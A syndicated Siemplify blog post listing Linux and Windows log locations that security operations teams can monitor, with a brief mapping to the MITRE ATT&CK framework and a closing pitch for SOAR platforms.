Your Security Operations Cheat Sheet for Windows and Linux Logs (And How to Tie Them to the MITRE ATT&CK Framework)
Within the security operations center, visibility is everything. Being aware of the details of users, assets, known threats, and specific vulnerabilities present across security, network, server, application and database sources allows security operations teams to act quickly and decisively to address possible risks.
Here is where Linux and Windows event logs come in, providing that essential observability into the goings-on across your organization’s network and digital footprint. But it is not always easy for teams to know where they should be looking. That’s because your logs are likely capturing huge volumes of data. Knowing which events are indicative of something major and worthy of further investigation, like a security breach, isn’t always self-evident.
That is why Siemplify Solutions Engineer Ivan Ninichuck compiled the below cheat sheet of go-to Windows and Linux logs – and mapped them to key tactics and techniques of the MITRE ATT&CK framework. This will allow your security operations team to know which log files are critical for activities such as monitoring, auditing, analysis, threat hunting, and overall security program improvement.
Keep this list handy, especially if your SOC’s maturity level needs a little boost!
LINUX LOGS
Location |
Description |
MITRE ATT&CK (Sub)Technique |
---|---|---|
/var/log/messages(debian /var/log/syslog) |
Stores all global system activity data, including startup messages |
|
/var/log/secure(debian /var/log/auth.log) |
Security-related events such as user logins, root user activity and PAM output |
|
/var/log/kern.log |
Contains errors, events and warning logs |
|
/var/log/cron |
Scheduled tasks (optimal for identifying persistence) |
|
/var/log/faillog |
Failed logon attempts |
|
/var/log/wtmp |
Contains all login and logout events |
|
/var/log/audit/audit |
System logs designed to record security events for incident investigation |
WINDOWS LOGS
C:\WINDOWS\system32\config\ |
This location is the storage point for the Windows event logs. These logs cover everything from system logs to security logs to application and service logs. For the purpose of this cheat sheet, we will break them down into categories in the following rows. |
Windows event logs can be used to investigate any MITRE ATT&CK technique applicable to the Windows OS. |
Application Log |
Any event logged by an application. |
|
System Log |
Any event that the operating system logs based on both normal and abnormal operations. |
|
PowerShell Log |
A special set of event logs in the ‘Application and Services’ section record all activity undertaken using the PowerShell scripting language |
|
Sysmon Log |
A special set of logs can be added in the ‘Application and Services’ by installing the Sysinternal tool Sysmon. It provides alerting based on key security events beyond that offered by the security log. |
|
Security Log |
All security events are logged in this category. Examples include valid/invalid logins, file deletions, registry changes and several others. |
|
Directory Service Log |
If the Windows OS is a domain controller, then Active Directory logs are located in this category. |
|
DNS Server Log |
If the Windows OS is acting as a DNS server then all logs for that Service are kept under this section. |
T1071.004: Exfiltration over Application Layer Protocol: DNS |
File Replication Service Log |
If the Windows OS is acting as a domain controller then all replication logs are kept under this section. |
Certain tools can help you collect, centralize and interpret the log data. SIEMs, for example, help to “connect the dots” about potential incidents by correlating events from these different sources, generating alerts for analysts about potentially malicious activity happening within the network.
It is that last step – generating alerts for analysts – that creates the need for something more. Given the manual-intensive, time-consuming and repetitive nature of alerts, several ramifications can result, including analysts being overwhelmed by their sheer volume. This can result in poor outcomes, like missing something important or even burning out.
For maximum effectiveness, you can connect your SIEM systems (or other detection tools like EDR, NDR, anti-phishing, DLP and CASBs) to a security orchestration, automation and response (SOAR) platform, which will address the alerts.
SOAR helps to streamline the management of security issues through automated playbooks, manage disparate detection tools through a single interface and coordinate responses to security incidents.
Siemplify Community Edition: Get Started With a Free Version of SOAR
For our next post, we will look at some of the key cloud-related security logs (for example, Amazon Web Services (AWS) CloudWatch logs and Amazon Virtual Private Cloud Flow logs), that you must monitor.
Dan Kaplan is director of content at Siemplify.
The post Your Security Operations Cheat Sheet for Windows and Linux Logs (And How to Tie Them to the MITRE ATT&CK Framework) appeared first on Siemplify.
*** This is a Security Bloggers Network syndicated blog from Siemplify authored by Dan Kaplan. Read the original post at: https://www.siemplify.co/blog/your-security-operations-cheat-sheet-for-windows-and-linux-logs-and-how-to-tie-them-to-the-mitre-attck-framework/